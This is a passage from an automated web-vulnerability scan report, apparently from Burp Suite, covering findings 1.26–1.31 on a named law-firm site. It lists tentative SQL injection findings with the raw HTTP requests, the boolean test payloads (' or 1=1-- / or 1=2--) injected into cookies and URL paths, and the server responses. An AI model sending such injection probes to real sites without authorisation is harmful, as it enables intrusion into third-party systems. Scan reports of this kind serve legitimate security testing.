Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.26. http://www.curtis.com/favicon.ico [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 35245083%20or%201%3d1--%20 and 35245083%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d1--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d2--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.27. http://www.curtis.com/favicon.ico [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16393691'%20or%201%3d1--%20 and 16393691'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.28. http://www.curtis.com/favicon.ico [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10585096'%20or%201%3d1--%20 and 10585096'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.29. http://www.curtis.com/flash/curtis.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /flash/curtis.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 52212528'%20or%201%3d1--%20 and 52212528'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash52212528'%20or%201%3d1--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash52212528'%20or%201%3d2--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.30. http://www.curtis.com/flash/curtis.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /flash/curtis.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21436775'%20or%201%3d1--%20 and 21436775'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash/curtis.swf21436775'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash/curtis.swf21436775'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.31. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 23520338'%20or%201%3d1--%20 and 23520338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts23520338'%20or%201%3d1--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
